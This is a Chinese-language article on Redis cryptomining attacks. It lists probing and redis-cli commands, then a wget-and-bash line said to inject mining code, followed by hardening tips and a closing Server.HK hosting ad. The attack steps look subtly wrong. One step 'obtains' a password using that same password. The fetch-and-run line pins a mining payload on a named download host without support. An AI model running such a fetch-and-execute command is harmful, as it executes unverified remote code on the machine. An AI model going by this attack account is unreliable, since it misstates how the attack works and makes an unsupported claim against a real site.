Redis漏洞挖矿:黑客攻击窃取越来越多
Redis是一个开源的内存数据结构存储系统,被广泛应用于 Web 缓存、分布式会话、消息队列等场景中。随着 Redis 应用的普及,其也成为了黑客攻击的目标之一。近期,国内外多个机构相继发布 Redis 漏洞挖矿事件的报告,黑客利用 Redis 漏洞进行挖矿,窃取大量的计算机性能资源及个人信息数据。
Redis 漏洞原理
Redis 漏洞产生的原因,主要是基于Redis默认情况下会绑定所有IP地址,开放6379端口,未加安全验证功能,同时在官方文档也没有强调安全措施的必要性,因此在网络上早期就被揭示出其“危险性”。
黑客利用漏洞的过程,可以简单分为以下几步:
1. 探测VPS服务器是否有Redis服务及其版本。
telnet IP地址(如:127.0.0.1) Redis端口(默认6379)
2. 扫描Redis信息,获取Redis的密码及版本等信息。
echo info|redis-cli -h IP地址 -a Redis密码 -p 端口
3. 注入挖矿代码,同步进行挖矿操作。
wget http://download.bt.cn/tools/redis_mgr.sh && bash redis_mgr.sh
经过漏洞攻击之后,被攻击的Redis服务会开始进行挖矿操作,损耗 CPU 计算能力,严重到会导致机器瘫痪,可能会被彻底破坏或受到不可逆的损害。
如何防止Redis漏洞攻击
针对Redis漏洞攻击的实战解决方案,推荐以下几个建议:
1. 合理设置Redis访问密码:由于Redis服务器绑定了所有IP地址,因此设置访问密码是 Redis 服务器安全保护重要措施。修改文件/etc/redis.conf,在文件结尾添加requirepass密码,即可完成密码访问验证配置。
2. 使用Redis的最新版本:Redis的个别版本存在安全漏洞,如Redis 3.0.6/3.0.7版本等,因此Redis使用者可以在 官网(https://redis.io/download)上下载最新的安全版本,避免被攻击威胁。
3. 合理开启一些防御措施:在Redis的配置文件中开启不同的应用场景的配置文件选项,如限制内存使用、禁用命令等功能,增强Redis服务的安全性和保护能力。
4. 提高Redis服务初始安装时的安全性设置:可直接使用Redis安装包进行安装,然后随着业务发展和安全考虑,为 Redis 重新配置日志记录、网络安全、SSL/TLS 组件等信息,并加强 Redis 的访问权限。
结论
针对 Redis 漏洞挖矿的攻击事件,要充分认识 Redis 服务安全保护的必要性,以更高效、更规范的方法加强 Redis 服务的安全性能,在日常运维中定期监控 Redis 服务的运行状况、升级最新版本,提高服务安全性和保护能力,在保障用户数据安全的同时,保障自身安全完整性。
香港服务器首选港服(Server.HK),2H2G首月10元开通。
港服(Server.HK)(www.IDC.Net)提供简单好用,价格厚道的香港/美国云服务器和独立服务器。IDC+ISP+ICP资质。ARIN和APNIC会员。成熟技术团队15年行业经验。